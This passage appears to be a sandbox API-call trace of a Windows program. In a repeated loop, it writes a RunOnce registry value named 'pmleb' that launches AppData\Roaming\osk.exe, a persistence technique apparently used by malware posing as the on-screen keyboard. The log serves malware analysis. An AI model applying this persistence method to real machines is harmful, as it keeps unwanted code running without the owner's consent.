dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.231] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.231] RegCloseKey (hKey=0x280) returned 0x0 [0085.231] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.231] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.231] SetTimer (hWnd=0x20280, nIDEvent=0x219e, uElapse=0xa, lpTimerFunc=0x0) returned 0x219e [0085.232] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.244] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.244] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.244] KillTimer (hWnd=0x20280, uIDEvent=0x219e) returned 1 [0085.244] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.245] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.245] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.245] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.245] RegCloseKey (hKey=0x280) returned 0x0 [0085.246] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.246] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.246] SetTimer (hWnd=0x20280, nIDEvent=0x219f, uElapse=0xa, lpTimerFunc=0x0) returned 0x219f 
[0085.246] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.259] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.259] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.260] KillTimer (hWnd=0x20280, uIDEvent=0x219f) returned 1 [0085.260] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.260] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.261] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.261] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.261] RegCloseKey (hKey=0x280) returned 0x0 [0085.261] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.261] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.261] SetTimer (hWnd=0x20280, nIDEvent=0x21a0, uElapse=0xa, lpTimerFunc=0x0) returned 0x21a0 [0085.262] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.276] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.276] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.277] KillTimer (hWnd=0x20280, uIDEvent=0x21a0) returned 1 [0085.277] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.277] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.277] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: 
phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.278] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.278] RegCloseKey (hKey=0x280) returned 0x0 [0085.278] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.278] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.278] SetTimer (hWnd=0x20280, nIDEvent=0x21a1, uElapse=0xa, lpTimerFunc=0x0) returned 0x21a1 [0085.278] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.383] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.383] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.384] KillTimer (hWnd=0x20280, uIDEvent=0x21a1) returned 1 [0085.384] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.384] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.384] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.385] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.385] RegCloseKey (hKey=0x280) returned 0x0 [0085.385] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.385] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.385] SetTimer (hWnd=0x20280, nIDEvent=0x21a2, uElapse=0xa, lpTimerFunc=0x0) returned 0x21a2 [0085.385] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: 
lpMsg=0x33f7fc) returned 1 [0085.400] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.400] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.400] KillTimer (hWnd=0x20280, uIDEvent=0x21a2) returned 1 [0085.400] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.401] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.401] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.401] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.401] RegCloseKey (hKey=0x280) returned 0x0 [0085.401] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.401] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.401] SetTimer (hWnd=0x20280, nIDEvent=0x21a3, uElapse=0xa, lpTimerFunc=0x0) returned 0x21a3 [0085.401] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.416] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.416] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.416] KillTimer (hWnd=0x20280, uIDEvent=0x21a3) returned 1 [0085.416] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.416] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.416] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.417] RegSetValueExA (in: 
hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.417] RegCloseKey (hKey=0x280) returned 0x0 [0085.417] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.417] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.417] SetTimer (hWnd=0x20280, nIDEvent=0x21a4, uElapse=0xa, lpTimerFunc=0x0) returned 0x21a4 [0085.417] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.431] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.431] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.431] KillTimer (hWnd=0x20280, uIDEvent=0x21a4) returned 1 [0085.431] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.432] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.432] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.432] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.432] RegCloseKey (hKey=0x280) returned 0x0 [0085.432] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.432] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.432] SetTimer (hWnd=0x20280, nIDEvent=0x21a5, uElapse=0xa, lpTimerFunc=0x0) returned 0x21a5 [0085.432] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.447] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.447] 
DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.447] KillTimer (hWnd=0x20280, uIDEvent=0x21a5) returned 1 [0085.447] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.447] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.447] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.448] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.448] RegCloseKey (hKey=0x280) returned 0x0 [0085.448] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.448] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.448] SetTimer (hWnd=0x20280, nIDEvent=0x21a6, uElapse=0xa, lpTimerFunc=0x0) returned 0x21a6 [0085.448] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.462] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.462] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.462] KillTimer (hWnd=0x20280, uIDEvent=0x21a6) returned 1 [0085.463] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.463] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.463] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.463] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.463] RegCloseKey (hKey=0x280) returned 0x0 [0085.463] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.464] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.464] SetTimer (hWnd=0x20280, nIDEvent=0x21a7, uElapse=0xa, lpTimerFunc=0x0) returned 0x21a7 [0085.464] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.478] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.478] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.478] KillTimer (hWnd=0x20280, uIDEvent=0x21a7) returned 1 [0085.478] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.478] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.479] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.479] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.479] RegCloseKey (hKey=0x280) returned 0x0 [0085.479] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.479] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.479] SetTimer (hWnd=0x20280, nIDEvent=0x21a8, uElapse=0xa, lpTimerFunc=0x0) returned 0x21a8 [0085.479] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.494] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.494] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.494] KillTimer (hWnd=0x20280, 
uIDEvent=0x21a8) returned 1 [0085.494] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.495] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.495] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.495] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.495] RegCloseKey (hKey=0x280) returned 0x0 [0085.496] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.496] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.496] SetTimer (hWnd=0x20280, nIDEvent=0x21a9, uElapse=0xa, lpTimerFunc=0x0) returned 0x21a9 [0085.496] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.509] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.509] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.509] KillTimer (hWnd=0x20280, uIDEvent=0x21a9) returned 1 [0085.510] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.510] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.510] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.510] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.510] RegCloseKey (hKey=0x280) returned 0x0 [0085.510] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.510] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.510] SetTimer (hWnd=0x20280, nIDEvent=0x21aa, uElapse=0xa, lpTimerFunc=0x0) returned 0x21aa [0085.511] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.528] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.528] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.528] KillTimer (hWnd=0x20280, uIDEvent=0x21aa) returned 1 [0085.528] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.528] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.528] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.529] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.529] RegCloseKey (hKey=0x280) returned 0x0 [0085.529] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.529] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.529] SetTimer (hWnd=0x20280, nIDEvent=0x21ab, uElapse=0xa, lpTimerFunc=0x0) returned 0x21ab [0085.529] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.541] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.541] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.541] KillTimer (hWnd=0x20280, uIDEvent=0x21ab) returned 1 [0085.541] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0085.542] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.542] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.542] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.542] RegCloseKey (hKey=0x280) returned 0x0 [0085.542] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.543] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.543] SetTimer (hWnd=0x20280, nIDEvent=0x21ac, uElapse=0xa, lpTimerFunc=0x0) returned 0x21ac [0085.543] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.556] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.556] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.556] KillTimer (hWnd=0x20280, uIDEvent=0x21ac) returned 1 [0085.556] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.557] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.557] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.557] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.557] RegCloseKey (hKey=0x280) returned 0x0 
[0085.557] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.558] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.558] SetTimer (hWnd=0x20280, nIDEvent=0x21ad, uElapse=0xa, lpTimerFunc=0x0) returned 0x21ad [0085.558] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.571] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.572] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.572] KillTimer (hWnd=0x20280, uIDEvent=0x21ad) returned 1 [0085.572] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.572] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.573] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.573] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.573] RegCloseKey (hKey=0x280) returned 0x0 [0085.573] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.573] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.573] SetTimer (hWnd=0x20280, nIDEvent=0x21ae, uElapse=0xa, lpTimerFunc=0x0) returned 0x21ae [0085.573] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.587] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.587] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.587] KillTimer (hWnd=0x20280, uIDEvent=0x21ae) returned 1 [0085.588] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.588] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.588] 
RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.588] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.589] RegCloseKey (hKey=0x280) returned 0x0 [0085.589] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.589] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.589] SetTimer (hWnd=0x20280, nIDEvent=0x21af, uElapse=0xa, lpTimerFunc=0x0) returned 0x21af [0085.589] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.603] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.603] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.604] KillTimer (hWnd=0x20280, uIDEvent=0x21af) returned 1 [0085.604] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.604] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.605] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.605] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.605] RegCloseKey (hKey=0x280) returned 0x0 [0085.605] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.605] 
